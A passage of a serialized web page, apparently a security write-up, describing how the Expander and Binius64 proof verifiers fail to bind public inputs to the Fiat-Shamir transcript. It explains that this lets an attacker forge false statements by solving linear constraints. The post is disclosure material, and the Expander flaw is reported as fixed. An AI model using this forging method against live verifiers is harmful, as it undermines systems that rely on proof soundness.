(Polyhedra)",{"type":24,"tag":32,"props":127928,"children":127929},{},[127930],{"type":30,"value":127931},"Expander is a GKR-based proof system for arithmetic circuits.",{"type":24,"tag":32,"props":127933,"children":127934},{},[127935],{"type":24,"tag":60,"props":127936,"children":127937},{},[127938],{"type":30,"value":122155},{"type":24,"tag":291,"props":127940,"children":127942},{"code":127941},"Proof (raw bytes, parsed in order):\n - PCS commitment\n - Sumcheck round polynomials (for each layer)\n - Layer claims (claim_x, claim_y)\n - PCS opening proofs\n\nNOT in proof bytes (passed separately):\n - public_input // statement data passed separately\n - claimed_v // statement claim passed separately\n",[127943],{"type":24,"tag":145,"props":127944,"children":127945},{"__ignoreMap":7},[127946],{"type":30,"value":127941},{"type":24,"tag":32,"props":127948,"children":127949},{},[127950,127952,127958],{"type":30,"value":127951},"In Expander's circuit model, constant gates can reference public input values. During GKR verification, the ",{"type":24,"tag":145,"props":127953,"children":127955},{"className":127954},[],[127956],{"type":30,"value":127957},"eval_cst",{"type":30,"value":127959}," evaluates the contribution of these gates at the sumcheck challenge point:",{"type":24,"tag":291,"props":127961,"children":127963},{"code":127962,"language":9817,"meta":7,"className":9818,"style":7},"sum -= GKRVerifierHelper::eval_cst(&layer.const_, public_input, sp);\n",[127964],{"type":24,"tag":145,"props":127965,"children":127966},{"__ignoreMap":7},[127967],{"type":24,"tag":301,"props":127968,"children":127969},{"class":303,"line":304},[127970,127974,127979,127984,127988,127992,127996,128000,128005,128009,128014,128019,128023,128028],{"type":24,"tag":301,"props":127971,"children":127972},{"style":369},[127973],{"type":30,"value":83344},{"type":24,"tag":301,"props":127975,"children":127976},{"style":385},[127977],{"type":30,"value":127978}," -=",{"type":24,"tag":301,"props":127980,"children":127981},{"style":10246},[127982],{"type":30,"value":127983}," GKRVerifierHelper",{"type":24,"tag":301,"props":127985,"children":127986},{"style":385},[127987],{"type":30,"value":10308},{"type":24,"tag":301,"props":127989,"children":127990},{"style":314},[127991],{"type":30,"value":127957},{"type":24,"tag":301,"props":127993,"children":127994},{"style":359},[127995],{"type":30,"value":362},{"type":24,"tag":301,"props":127997,"children":127998},{"style":385},[127999],{"type":30,"value":556},{"type":24,"tag":301,"props":128001,"children":128002},{"style":369},[128003],{"type":30,"value":128004},"layer",{"type":24,"tag":301,"props":128006,"children":128007},{"style":385},[128008],{"type":30,"value":206},{"type":24,"tag":301,"props":128010,"children":128011},{"style":359},[128012],{"type":30,"value":128013},"const_, ",{"type":24,"tag":301,"props":128015,"children":128016},{"style":369},[128017],{"type":30,"value":128018},"public_input",{"type":24,"tag":301,"props":128020,"children":128021},{"style":359},[128022],{"type":30,"value":377},{"type":24,"tag":301,"props":128024,"children":128025},{"style":369},[128026],{"type":30,"value":128027},"sp",{"type":24,"tag":301,"props":128029,"children":128030},{"style":359},[128031],{"type":30,"value":589},{"type":24,"tag":32,"props":128033,"children":128034},{},[128035,128037,128042],{"type":30,"value":128036},"This evaluation is a linear combination of public input values, weighted by coefficients derived from the challenges stored in the verifier's scratch pad (",{"type":24,"tag":145,"props":128038,"children":128040},{"className":128039},[],[128041],{"type":30,"value":128027},{"type":30,"value":27511},{"type":24,"tag":32,"props":128044,"children":128045},{},[128046],{"type":24,"tag":60,"props":128047,"children":128048},{},[128049],{"type":30,"value":128050},"The vulnerability:",{"type":24,"tag":32,"props":128052,"children":128053},{},[128054,128059],{"type":24,"tag":145,"props":128055,"children":128057},{"className":128056},[],[128058],{"type":30,"value":128018},{"type":30,"value":128060}," is never absorbed into the transcript. The transcript is initialized from the PCS commitment and sumcheck round messages, but public inputs are passed separately to the verifier.",{"type":24,"tag":32,"props":128062,"children":128063},{},[128064],{"type":24,"tag":177,"props":128065,"children":128068},{"alt":128066,"src":128067},"9_expander","/posts/zkvms-unfaithful-claims/9_expander.svg",[],{"type":24,"tag":32,"props":128070,"children":128071},{},[128072,128073,128078],{"type":30,"value":8079},{"type":24,"tag":145,"props":128074,"children":128076},{"className":128075},[],[128077],{"type":30,"value":127957},{"type":30,"value":128079}," function computes a linear combination:",{"type":24,"tag":32,"props":128081,"children":128082},{},[128083],{"type":24,"tag":145,"props":128084,"children":128086},{"className":128085},[10807,10808],[128087],{"type":24,"tag":301,"props":128088,"children":128090},{"className":128089},[10813],[128091],{"type":24,"tag":301,"props":128092,"children":128094},{"className":128093,"ariaHidden":10819},[10818],[128095,128140,128264],{"type":24,"tag":301,"props":128096,"children":128098},{"className":128097},[10824],[128099,128103,128112,128117,128127,128131,128136],{"type":24,"tag":301,"props":128100,"children":128102},{"className":128101,"style":101157},[10829],[],{"type":24,"tag":301,"props":128104,"children":128106},{"className":128105},[10835,30],[128107],{"type":24,"tag":301,"props":128108,"children":128110},{"className":128109},[10835],[128111],{"type":30,"value":44287},{"type":24,"tag":301,"props":128113,"children":128115},{"className":128114,"style":99745},[10835],[128116],{"type":30,"value":9918},{"type":24,"tag":301,"props":128118,"children":128120},{"className":128119},[10835,30],[128121],{"type":24,"tag":301,"props":128122,"children":128124},{"className":128123},[10835],[128125],{"type":30,"value":128126},"cst",{"type":24,"tag":301,"props":128128,"children":128130},{"className":128129,"style":11012},[10914],[],{"type":24,"tag":301,"props":128132,"children":128134},{"className":128133},[11017],[128135],{"type":30,"value":523},{"type":24,"tag":301,"props":128137,"children":128139},{"className":128138,"style":11012},[10914],[],{"type":24,"tag":301,"props":128141,"children":128143},{"className":128142},[10824],[128144,128148,128205,128209,128236,128241,128246,128251,128255,128260],{"type":24,"tag":301,"props":128145,"children":128147},{"className":128146,"style":99687},[10829],[],{"type":24,"tag":301,"props":128149,"children":128151},{"className":128150},[28393],[128152,128157],{"type":24,"tag":301,"props":128153,"children":128155},{"className":128154,"style":28400},[28393,28398,28399],[128156],{"type":30,"value":115536},{"type":24,"tag":301,"props":128158,"children":128160},{"className":128159},[10850],[128161],{"type":24,"tag":301,"props":128162,"children":128164},{"className":128163},[10855,28411],[128165,128194],{"type":24,"tag":301,"props":128166,"children":128168},{"className":128167},[10860],[128169,128189],{"type":24,"tag":301,"props":128170,"children":128172},{"className":128171,"style":120946},[10865],[128173],{"type":24,"tag":301,"props":128174,"children":128175},{"style":28424},[128176,128180],{"type":24,"tag":301,"props":128177,"children":128179},{"className":128178,"style":10875},[10874],[],{"type":24,"tag":301,"props":128181,"children":128183},{"className":128182},[10880,10881,10882,10883],[128184],{"type":24,"tag":301,"props":128185,"children":128187},{"className":128186},[10835,28357,10883],[128188],{"type":30,"value":10564},{"type":24,"tag":301,"props":128190,"children":128192},{"className":128191},[28514],[128193],{"type":30,"value":28517},{"type":24,"tag":301,"props":128195,"children":128197},{"className":128196},[10860],[128198],{"type":24,"tag":301,"props":128199,"children":128201},{"className":128200,"style":121226},[10865],[128202],{"type":24,"tag":301,"props":128203,"children":128204},{},[],{"type":24,"tag":301,"props":128206,"children":128208},{"className":128207,"style":10953},[10914],[],{"type":24,"tag":301,"props":128210,"children":128212},{"className":128211},[10835],[128213,128222,128227],{"type":24,"tag":301,"props":128214,"children":128216},{"className":128215},[10835,30],[128217],{"type":24,"tag":301,"props":128218,"children":128220},{"className":128219},[10835],[128221],{"type":30,"value":68388},{"type":24,"tag":301,"props":128223,"children":128225},{"className":128224,"style":99745},[10835],[128226],{"type":30,"value":9918},{"type":24,"tag":301,"props":128228,"children":128230},{"className":128229},[10835,30],[128231],{"type":24,"tag":301,"props":128232,"children":128234},{"className":128233},[10835],[128235],{"type":30,"value":15181},{"type":24,"tag":301,"props":128237,"children":128239},{"className":128238},[28486],[128240],{"type":30,"value":541},{"type":24,"tag":301,"props":128242,"children":128244},{"className":128243},[10835,28357],[128245],{"type":30,"value":10564},{"type":24,"tag":301,"props":128247,"children":128249},{"className":128248},[28508],[128250],{"type":30,"value":22200},{"type":24,"tag":301,"props":128252,"children":128254},{"className":128253,"style":10915},[10914],[],{"type":24,"tag":301,"props":128256,"children":128258},{"className":128257},[10920],[128259],{"type":30,"value":118002},{"type":24,"tag":301,"props":128261,"children":128263},{"className":128262,"style":10915},[10914],[],{"type":24,"tag":301,"props":128265,"children":128267},{"className":128266},[10824],[128268,128272,128281,128286,128291,128296,128300,128349],{"type":24,"tag":301,"props":128269,"children":128271},{"className":128270,"style":10935},[10829],[],{"type":24,"tag":301,"props":128273,"children":128275},{"className":128274},[10835,30],[128276],{"type":24,"tag":301,"props":128277,"children":128279},{"className":128278},[10835],[128280],{"type":30,"value":119329},{"type":24,"tag":301,"props":128282,"children":128284},{"className":128283},[28486],[128285],{"type":30,"value":362},{"type":24,"tag":301,"props":128287,"children":128289},{"className":128288},[10835,28357],[128290],{"type":30,"value":10564},{"type":24,"tag":301,"props":128292,"children":128294},{"className":128293},[10946],[128295],{"type":30,"value":10949},{"type":24,"tag":301,"props":128297,"children":128299},{"className":128298,"style":10953},[10914],[],{"type":24,"tag":301,"props":128301,"children":128303},{"className":128302},[10835,118889],[128304],{"type":24,"tag":301,"props":128305,"children":128307},{"className":128306},[10855],[128308],{"type":24,"tag":301,"props":128309,"children":128311},{"className":128310},[10860],[128312],{"type":24,"tag":301,"props":128313,"children":128315},{"className":128314,"style":118975},[10865],[128316,128328],{"type":24,"tag":301,"props":128317,"children":128318},{"style":118906},[128319,128323],{"type":24,"tag":301,"props":128320,"children":128322},{"className":128321,"style":118911},[10874],[],{"type":24,"tag":301,"props":128324,"children":128326},{"className":128325,"style":99745},[10835,28357],[128327],{"type":30,"value":100563},{"type":24,"tag":301,"props":128329,"children":128330},{"style":118906},[128331,128335],{"type":24,"tag":301,"props":128332,"children":128334},{"className":128333,"style":118911},[10874],[],{"type":24,"tag":301,"props":128336,"children":128338},{"className":128337,"style":118999},[118929],[128339],{"type":24,"tag":301,"props":128340,"children":128342},{"className":128341,"style":119005},[119004],[128343],{"type":24,"tag":41022,"props":128344,"children":128345},{"xmlns":119009,"width":119010,"height":119011,"style":119012,"viewBox":119013,"preserveAspectRatio":119014},[128346],{"type":24,"tag":119017,"props":128347,"children":128348},{"d":119019},[],{"type":24,"tag":301,"props":128350,"children":128352},{"className":128351},[28508],[128353],{"type":30,"value":9961},{"type":24,"tag":32,"props":128355,"children":128356},{},[128357,128358,128427,128429,128434,128436,128441],{"type":30,"value":122575},{"type":24,"tag":145,"props":128359,"children":128361},{"className":128360},[10807,10808],[128362],{"type":24,"tag":301,"props":128363,"children":128365},{"className":128364},[10813],[128366],{"type":24,"tag":301,"props":128367,"children":128369},{"className":128368,"ariaHidden":10819},[10818],[128370],{"type":24,"tag":301,"props":128371,"children":128373},{"className":128372},[10824],[128374,128378],{"type":24,"tag":301,"props":128375,"children":128377},{"className":128376,"style":118975},[10829],[],{"type":24,"tag":301,"props":128379,"children":128381},{"className":128380},[10835,118889],[128382],{"type":24,"tag":301,"props":128383,"children":128385},{"className":128384},[10855],[128386],{"type":24,"tag":301,"props":128387,"children":128389},{"className":128388},[10860],[128390],{"type":24,"tag":301,"props":128391,"children":128393},{"className":128392,"style":118975},[10865],[128394,128406],{"type":24,"tag":301,"props":128395,"children":128396},{"style":118906},[128397,128401],{"type":24,"tag":301,"props":128398,"children":128400},{"className":128399,"style":118911},[10874],[],{"type":24,"tag":301,"props":128402,"children":128404},{"className":128403,"style":99745},[10835,28357],[128405],{"type":30,"value":100563},{"type":24,"tag":301,"props":128407,"children":128408},{"style":118906},[128409,128413],{"type":24,"tag":301,"props":128410,"children":128412},{"className":128411,"style":118911},[10874],[],{"type":24,"tag":301,"props":128414,"children":128416},{"className":128415,"style":118999},[118929],[128417],{"type":24,"tag":301,"props":128418,"children":128420},{"className":128419,"style":119005},[119004],[128421],{"type":24,"tag":41022,"props":128422,"children":128423},{"xmlns":119009,"width":119010,"height":119011,"style":119012,"viewBox":119013,"preserveAspectRatio":119014},[128424],{"type":24,"tag":119017,"props":128425,"children":128426},{"d":119019},[],{"type":30,"value":128428}," contains the challenges. Since challenges are derived before the statement data is bound, they are independent of ",{"type":24,"tag":145,"props":128430,"children":128432},{"className":128431},[],[128433],{"type":30,"value":128018},{"type":30,"value":128435},". This lets an attacker choose an arbitrary false statement (e.g., a forged output) and then solve the induced linear constraints for a modified ",{"type":24,"tag":145,"props":128437,"children":128439},{"className":128438},[],[128440],{"type":30,"value":128018},{"type":30,"value":128442}," that makes the verifier's check pass.",{"type":24,"tag":32,"props":128444,"children":128445},{},[128446,128450,128452,128459,128460,128463,128470],{"type":24,"tag":60,"props":128447,"children":128448},{},[128449],{"type":30,"value":123449},{"type":30,"value":128451}," Fixed on 21st January 2026 via ",{"type":24,"tag":188,"props":128453,"children":128456},{"href":128454,"rel":128455},"https://github.com/PolyhedraZK/Expander/commit/4a8c2be03535194c1f6b48a93ad2f5480649f7c2",[192],[128457],{"type":30,"value":128458},"commit 4a8c2be",{"type":30,"value":13277},{"type":24,"tag":37724,"props":128461,"children":128462},{},[],{"type":24,"tag":188,"props":128464,"children":128467},{"href":128465,"rel":128466},"https://blog.polyhedra.network/expander-bug-bounty/",[192],[128468],{"type":30,"value":128469},"Claimed 500k Bug bounty",{"type":30,"value":128471}," award pending",{"type":24,"tag":2719,"props":128473,"children":128474},{},[],{"type":24,"tag":80,"props":128476,"children":128478},{"id":128477},"binius64",[128479],{"type":30,"value":114584},{"type":24,"tag":32,"props":128481,"children":128482},{},[128483,128485,128612],{"type":30,"value":128484},"Binius64 is a proof system optimized for binary fields, designed to be efficient on 64-bit CPUs. Binius uses ",{"type":24,"tag":145,"props":128486,"children":128488},{"className":128487},[10807,10808],[128489],{"type":24,"tag":301,"props":128490,"children":128492},{"className":128491},[10813],[128493],{"type":24,"tag":301,"props":128494,"children":128496},{"className":128495,"ariaHidden":10819},[10818],[128497],{"type":24,"tag":301,"props":128498,"children":128500},{"className":128499},[10824],[128501,128506],{"type":24,"tag":301,"props":128502,"children":128505},{"className":128503,"style":128504},[10829],"height:0.8665em;vertical-align:-0.1776em;",[],{"type":24,"tag":301,"props":128507,"children":128509},{"className":128508},[10835],[128510,128517],{"type":24,"tag":301,"props":128511,"children":128514},{"className":128512},[10835,128513],"mathbb",[128515],{"type":30,"value":128516},"F",{"type":24,"tag":301,"props":128518,"children":128520},{"className":128519},[10850],[128521],{"type":24,"tag":301,"props":128522,"children":128524},{"className":128523},[10855,28411],[128525,128600],{"type":24,"tag":301,"props":128526,"children":128528},{"className":128527},[10860],[128529,128595],{"type":24,"tag":301,"props":128530,"children":128532},{"className":128531,"style":119072},[10865],[128533],{"type":24,"tag":301,"props":128534,"children":128536},{"style":128535},"top:-2.5224em;margin-left:0em;margin-right:0.05em;",[128537,128541],{"type":24,"tag":301,"props":128538,"children":128540},{"className":128539,"style":10875},[10874],[],{"type":24,"tag":301,"props":128542,"children":128544},{"className":128543},[10880,10881,10882,10883],[128545],{"type":24,"tag":301,"props":128546,"children":128548},{"className":128547},[10835,10883],[128549],{"type":24,"tag":301,"props":128550,"children":128552},{"className":128551},[10835,10883],[128553,128558],{"type":24,"tag":301,"props":128554,"children":128556},{"className":128555},[10835,10883],[128557],{"type":30,"value":1503},{"type":24,"tag":301,"props":128559,"children":128561},{"className":128560},[10850],[128562],{"type":24,"tag":301,"props":128563,"children":128565},{"className":128564},[10855],[128566],{"type":24,"tag":301,"props":128567,"children":128569},{"className":128568},[10860],[128570],{"type":24,"tag":301,"props":128571,"children":128574},{"className":128572,"style":128573},[10865],"height:0.7463em;",[128575],{"type":24,"tag":301,"props":128576,"children":128577},{"style":119197},[128578,128582],{"type":24,"tag":301,"props":128579,"children":128581},{"className":128580,"style":115601},[10874],[],{"type":24,"tag":301,"props":128583,"children":128585},{"className":128584},[10880,115606,115607,10883],[128586],{"type":24,"tag":301,"props":128587,"children":128589},{"className":128588},[10835,10883],[128590],{"type":24,"tag":301,"props":128591,"children":128593},{"className":128592},[10835,10883],[128594],{"type":30,"value":2060},{"type":24,"tag":301,"props":128596,"children":128598},{"className":128597},[28514],[128599],{"type":30,"value":28517},{"type":24,"tag":301,"props":128601,"children":128603},{"className":128602},[10860],[128604],{"type":24,"tag":301,"props":128605,"children":128608},{"className":128606,"style":128607},[10865],"height:0.1776em;",[128609],{"type":24,"tag":301,"props":128610,"children":128611},{},[],{"type":30,"value":128613}," (or variants thereof), where addition is XOR. This makes certain operations very fast.",{"type":24,"tag":32,"props":128615,"children":128616},{},[128617,128619,128624],{"type":30,"value":128618},"One of Binius's key features is its specialized protocols for bitwise operations. The ",{"type":24,"tag":60,"props":128620,"children":128621},{},[128622],{"type":30,"value":128623},"Shift Protocol",{"type":30,"value":128625}," efficiently handles bit-shifts and rotations (essential for hash functions like SHA-256) without the massive overhead typical in other proof systems.",{"type":24,"tag":32,"props":128627,"children":128628},{},[128629],{"type":24,"tag":60,"props":128630,"children":128631},{},[128632],{"type":30,"value":128050},{"type":24,"tag":32,"props":128634,"children":128635},{},[128636],{"type":30,"value":128637},"The verifier receives the public witness (program inputs/outputs) as a separate parameter:",{"type":24,"tag":291,"props":128639,"children":128641},{"code":128640,"language":9817,"meta":7,"className":9818,"style":7},"pub fn verify\u003CF, C>(\n constraint_system: &ConstraintSystem,\n public: &[Word], // \u003C- NEVER ABSORBED\n // ...\n) -> Result\u003CVerifyOutput\u003CF>, Error>\n",[128642],{"type":24,"tag":145,"props":128643,"children":128644},{"__ignoreMap":7},[128645,128680,128705,128739,128747],{"type":24,"tag":301,"props":128646,"children":128647},{"class":303,"line":304},[128648,128652,128656,128660,128664,128668,128672,128676],{"type":24,"tag":301,"props":128649,"children":128650},{"style":348},[128651],{"type":30,"value":20484},{"type":24,"tag":301,"props":128653,"children":128654},{"style":348},[128655],{"type":30,"value":20489},{"type":24,"tag":301,"props":128657,"children":128658},{"style":314},[128659],{"type":30,"value":14981},{"type":24,"tag":301,"props":128661,"children":128662},{"style":359},[128663],{"type":30,"value":1849},{"type":24,"tag":301,"props":128665,"children":128666},{"style":10246},[128667],{"type":30,"value":128516},{"type":24,"tag":301,"props":128669,"children":128670},{"style":359},[128671],{"type":30,"value":377},{"type":24,"tag":301,"props":128673,"children":128674},{"style":10246},[128675],{"type":30,"value":122968},{"type":24,"tag":301,"props":128677,"children":128678},{"style":359},[128679],{"type":30,"value":13407},{"type":24,"tag":301,"props":128681,"children":128682},{"class":303,"line":320},[128683,128688,128692,128696,128701],{"type":24,"tag":301,"props":128684,"children":128685},{"style":369},[128686],{"type":30,"value":128687}," constraint_system",{"type":24,"tag":301,"props":128689,"children":128690},{"style":385},[128691],{"type":30,"value":1679},{"type":24,"tag":301,"props":128693,"children":128694},{"style":385},[128695],{"type":30,"value":991},{"type":24,"tag":301,"props":128697,"children":128698},{"style":10246},[128699],{"type":30,"value":128700},"ConstraintSystem",{"type":24,"tag":301,"props":128702,"children":128703},{"style":359},[128704],{"type":30,"value":1729},{"type":24,"tag":301,"props":128706,"children":128707},{"class":303,"line":335},[128708,128712,128716,128720,128724,128729,128734],{"type":24,"tag":301,"props":128709,"children":128710},{"style":369},[128711],{"type":30,"value":14337},{"type":24,"tag":301,"props":128713,"children":128714},{"style":385},[128715],{"type":30,"value":1679},{"type":24,"tag":301,"props":128717,"children":128718},{"style":385},[128719],{"type":30,"value":991},{"type":24,"tag":301,"props":128721,"children":128722},{"style":359},[128723],{"type":30,"value":541},{"type":24,"tag":301,"props":128725,"children":128726},{"style":10246},[128727],{"type":30,"value":128728},"Word",{"type":24,"tag":301,"props":128730,"children":128731},{"style":359},[128732],{"type":30,"value":128733},"], ",{"type":24,"tag":301,"props":128735,"children":128736},{"style":1062},[128737],{"type":30,"value":128738},"// \u003C- NEVER ABSORBED\n",{"type":24,"tag":301,"props":128740,"children":128741},{"class":303,"line":344},[128742],{"type":24,"tag":301,"props":128743,"children":128744},{"style":1062},[128745],{"type":30,"value":128746}," // ...\n",{"type":24,"tag":301,"props":128748,"children":128749},{"class":303,"line":401},[128750,128754,128758,128762,128766,128771,128775,128779,128783,128787],{"type":24,"tag":301,"props":128751,"children":128752},{"style":359},[128753],{"type":30,"value":911},{"type":24,"tag":301,"props":128755,"children":128756},{"style":385},[128757],{"type":30,"value":882},{"type":24,"tag":301,"props":128759,"children":128760},{"style":10246},[128761],{"type":30,"value":20555},{"type":24,"tag":301,"props":128763,"children":128764},{"style":359},[128765],{"type":30,"value":1849},{"type":24,"tag":301,"props":128767,"children":128768},{"style":10246},[128769],{"type":30,"value":128770},"VerifyOutput",{"type":24,"tag":301,"props":128772,"children":128773},{"style":359},[128774],{"type":30,"value":1849},{"type":24,"tag":301,"props":128776,"children":128777},{"style":10246},[128778],{"type":30,"value":128516},{"type":24,"tag":301,"props":128780,"children":128781},{"style":359},[128782],{"type":30,"value":13449},{"type":24,"tag":301,"props":128784,"children":128785},{"style":10246},[128786],{"type":30,"value":44138},{"type":24,"tag":301,"props":128788,"children":128789},{"style":359},[128790],{"type":30,"value":12812},{"type":24,"tag":32,"props":128792,"children":128793},{},[128794,128796,128802,128803,128809,128811,128815],{"type":30,"value":128795},"In the shift protocol, challenges ",{"type":24,"tag":145,"props":128797,"children":128799},{"className":128798},[],[128800],{"type":30,"value":128801},"r_j",{"type":30,"value":2378},{"type":24,"tag":145,"props":128804,"children":128806},{"className":128805},[],[128807],{"type":30,"value":128808},"inout_eval_point",{"type":30,"value":128810}," are sampled ",{"type":24,"tag":60,"props":128812,"children":128813},{},[128814],{"type":30,"value":111285},{"type":30,"value":128816}," the public witness is bound.",{"type":24,"tag":32,"props":128818,"children":128819},{},[128820],{"type":24,"tag":60,"props":128821,"children":128822},{},[128823],{"type":30,"value":122171},{"type":24,"tag":32,"props":128825,"children":128826},{},[128827],{"type":24,"tag":177,"props":128828,"children":128831},{"alt":128829,"src":128830},"10_binius","/posts/zkvms-unfaithful-claims/10_binius.svg",[],{"type":24,"tag":32,"props":128833,"children":128834},{},[128835],{"type":30,"value":128836},"During verification",{"type":24,"tag":6246,"props":128838,"children":128839},{},[128840,128860,128872,128891],{"type":24,"tag":2659,"props":128841,"children":128842},{},[128843,128845,128850,128852,128858],{"type":30,"value":128844},"Sumcheck produces challenge points ",{"type":24,"tag":145,"props":128846,"children":128848},{"className":128847},[],[128849],{"type":30,"value":128801},{"type":30,"value":128851}," (bit indices) and ",{"type":24,"tag":145,"props":128853,"children":128855},{"className":128854},[],[128856],{"type":30,"value":128857},"r_s",{"type":30,"value":128859}," (shift indices)",{"type":24,"tag":2659,"props":128861,"children":128862},{},[128863,128865,128870],{"type":30,"value":128864},"Verifier samples ",{"type":24,"tag":145,"props":128866,"children":128868},{"className":128867},[],[128869],{"type":30,"value":128808},{"type":30,"value":128871}," from transcript",{"type":24,"tag":2659,"props":128873,"children":128874},{},[128875,128877,128883,128885,128890],{"type":30,"value":128876},"Verifier computes ",{"type":24,"tag":145,"props":128878,"children":128880},{"className":128879},[],[128881],{"type":30,"value":128882},"public_eval = MLE(public, r_j, inout_eval_point)",{"type":30,"value":128884}," using the unbound ",{"type":24,"tag":145,"props":128886,"children":128888},{"className":128887},[],[128889],{"type":30,"value":68388},{"type":30,"value":24911},{"type":24,"tag":2659,"props":128892,"children":128893},{},[128894,128895,128901],{"type":30,"value":8079},{"type":24,"tag":145,"props":128896,"children":128898},{"className":128897},[],[128899],{"type":30,"value":128900},"public_eval",{"type":30,"value":128902}," feeds into subsequent verification equations",{"type":24,"tag":32,"props":128904,"children":128905},{},[128906],{"type":30,"value":128907},"The MLE evaluation is linear in the public witness bits:",{"type":24,"tag":32,"props":128909,"children":128910},{},[128911],{"type":24,"tag":145,"props":128912,"children":128914},{"className":128913},[10807,10808],[128915],{"type":24,"tag":301,"props":128916,"children":128918},{"className":128917},[10813],[128919],{"type":24,"tag":301,"props":128920,"children":128922},{"className":128921,"ariaHidden":10819},[10818],[128923,128967,129107,129219],{"type":24,"tag":301,"props":128924,"children":128926},{"className":128925},[10824],[128927,128931,128940,128945,128954,128958,128963],{"type":24,"tag":301,"props":128928,"children":128930},{"className":128929,"style":101157},[10829],[],{"type":24,"tag":301,"props":128932,"children":128934},{"className":128933},[10835,30],[128935],{"type":24,"tag":301,"props":128936,"children":128938},{"className":128937},[10835],[128939],{"type":30,"value":68388},{"type":24,"tag":301,"props":128941,"children":128943},{"className":128942,"style":99745},[10835],[128944],{"type":30,"value":9918},{"type":24,"tag":301,"props":128946,"children":128948},{"className":128947},[10835,30],[128949],{"type":24,"tag":301,"props":128950,"children":128952},{"className":128951},[10835],[128953],{"type":30,"value":44287},{"type":24,"tag":301,"props":128955,"children":128957},{"className":128956,"style":11012},[10914],[],{"type":24,"tag":301,"props":128959,"children":128961},{"className":128960},[11017],[128962],{"type":30,"value":523},{"type":24,"tag":301,"props":128964,"children":128966},{"className":128965,"style":11012},[10914],[],{"type":24,"tag":301,"props":128968,"children":128970},{"className":128969},[10824],[128971,128975,129047,129051,129064,129069,129074,129079,129084,129089,129094,129098,129103],{"type":24,"tag":301,"props":128972,"children":128974},{"className":128973,"style":125500},[10829],[],{"type":24,"tag":301,"props":128976,"children":128978},{"className":128977},[28393],[128979,128984],{"type":24,"tag":301,"props":128980,"children":128982},{"className":128981,"style":28400},[28393,28398,28399],[128983],{"type":30,"value":115536},{"type":24,"tag":301,"props":128985,"children":128987},{"className":128986},[10850],[128988],{"type":24,"tag":301,"props":128989,"children":128991},{"className":128990},[10855,28411],[128992,129036],{"type":24,"tag":301,"props":128993,"children":128995},{"className":128994},[10860],[128996,129031],{"type":24,"tag":301,"props":128997,"children":128999},{"className":128998,"style":120411},[10865],[129000],{"type":24,"tag":301,"props":129001,"children":129002},{"style":28424},[129003,129007],{"type":24,"tag":301,"props":129004,"children":129006},{"className":129005,"style":10875},[10874],[],{"type":24,"tag":301,"props":129008,"children":129010},{"className":129009},[10880,10881,10882,10883],[129011],{"type":24,"tag":301,"props":129012,"children":129014},{"className":129013},[10835,10883],[129015,129021,129026],{"type":24,"tag":301,"props":129016,"children":129019},{"className":129017,"style":129018},[10835,28357,10883],"margin-right:0.02691em;",[129020],{"type":30,"value":2580},{"type":24,"tag":301,"props":129022,"children":129024},{"className":129023},[10946,10883],[129025],{"type":30,"value":10949},{"type":24,"tag":301,"props":129027,"children":129029},{"className":129028},[10835,28357,10883],[129030],{"type":30,"value":5613},{"type":24,"tag":301,"props":129032,"children":129034},{"className":129033},[28514],[129035],{"type":30,"value":28517},{"type":24,"tag":301,"props":129037,"children":129039},{"className":129038},[10860],[129040],{"type":24,"tag":301,"props":129041,"children":129043},{"className":129042,"style":120977},[10865],[129044],{"type":24,"tag":301,"props":129045,"children":129046},{},[],{"type":24,"tag":301,"props":129048,"children":129050},{"className":129049,"style":10953},[10914],[],{"type":24,"tag":301,"props":129052,"children":129054},{"className":129053},[10835],[129055],{"type":24,"tag":301,"props":129056,"children":129058},{"className":129057},[10835,30],[129059],{"type":24,"tag":301,"props":129060,"children":129062},{"className":129061},[10835],[129063],{"type":30,"value":68388},{"type":24,"tag":301,"props":129065,"children":129067},{"className":129066},[28486],[129068],{"type":30,"value":541},{"type":24,"tag":301,"props":129070,"children":129072},{"className":129071,"style":129018},[10835,28357],[129073],{"type":30,"value":2580},{"type":24,"tag":301,"props":129075,"children":129077},{"className":129076},[28508],[129078],{"type":30,"value":22200},{"type":24,"tag":301,"props":129080,"children":129082},{"className":129081},[28486],[129083],{"type":30,"value":541},{"type":24,"tag":301,"props":129085,"children":129087},{"className":129086},[10835,28357],[129088],{"type":30,"value":5613},{"type":24,"tag":301,"props":129090,"children":129092},{"className":129091},[28508],[129093],{"type":30,"value":22200},{"type":24,"tag":301,"props":129095,"children":129097},{"className":129096,"style":10915},[10914],[],{"type":24,"tag":301,"props":129099,"children":129101},{"className":129100},[10920],[129102],{"type":30,"value":118002},{"type":24,"tag":301,"props":129104,"children":129106},{"className":129105,"style":10915},[10914],[],{"type":24,"tag":301,"props":129108,"children":129110},{"className":129109},[10824],[129111,129116,129125,129130,129135,129140,129144,129201,129206,129210,129215],{"type":24,"tag":301,"props":129112,"children":129115},{"className":129113,"style":129114},[10829],"height:1.0361em;vertical-align:-0.2861em;",[],{"type":24,"tag":301,"props":129117,"children":129119},{"className":129118},[10835,30],[129120],{"type":24,"tag":301,"props":129121,"children":129123},{"className":129122},[10835],[129124],{"type":30,"value":119329},{"type":24,"tag":301,"props":129126,"children":129128},{"className":129127},[28486],[129129],{"type":30,"value":362},{"type":24,"tag":301,"props":129131,"children":129133},{"className":129132},[10835,28357],[129134],{"type":30,"value":5613},{"type":24,"tag":301,"props":129136,"children":129138},{"className":129137},[10946],[129139],{"type":30,"value":10949},{"type":24,"tag":301,"props":129141,"children":129143},{"className":129142,"style":10953},[10914],[],{"type":24,"tag":301,"props":129145,"children":129147},{"className":129146},[10835],[129148,129153],{"type":24,"tag":301,"props":129149,"children":129151},{"className":129150,"style":99745},[10835,28357],[129152],{"type":30,"value":100563},{"type":24,"tag":301,"props":129154,"children":129156},{"className":129155},[10850],[129157],{"type":24,"tag":301,"props":129158,"children":129160},{"className":129159},[10855,28411],[129161,129190],{"type":24,"tag":301,"props":129162,"children":129164},{"className":129163},[10860],[129165,129185],{"type":24,"tag":301,"props":129166,"children":129168},{"className":129167,"style":100273},[10865],[129169],{"type":24,"tag":301,"props":129170,"children":129171},{"style":116739},[129172,129176],{"type":24,"tag":301,"props":129173,"children":129175},{"className":129174,"style":10875},[10874],[],{"type":24,"tag":301,"props":129177,"children":129179},{"className":129178},[10880,10881,10882,10883],[129180],{"type":24,"tag":301,"props":129181,"children":129183},{"className":129182,"style":120962},[10835,28357,10883],[129184],{"type":30,"value":15470},{"type":24,"tag":301,"props":129186,"children":129188},{"className":129187},[28514],[129189],{"type":30,"value":28517},{"type":24,"tag":301,"props":129191,"children":129193},{"className":129192},[10860],[129194],{"type":24,"tag":301,"props":129195,"children":129197},{"className":129196,"style":125648},[10865],[129198],{"type":24,"tag":301,"props":12919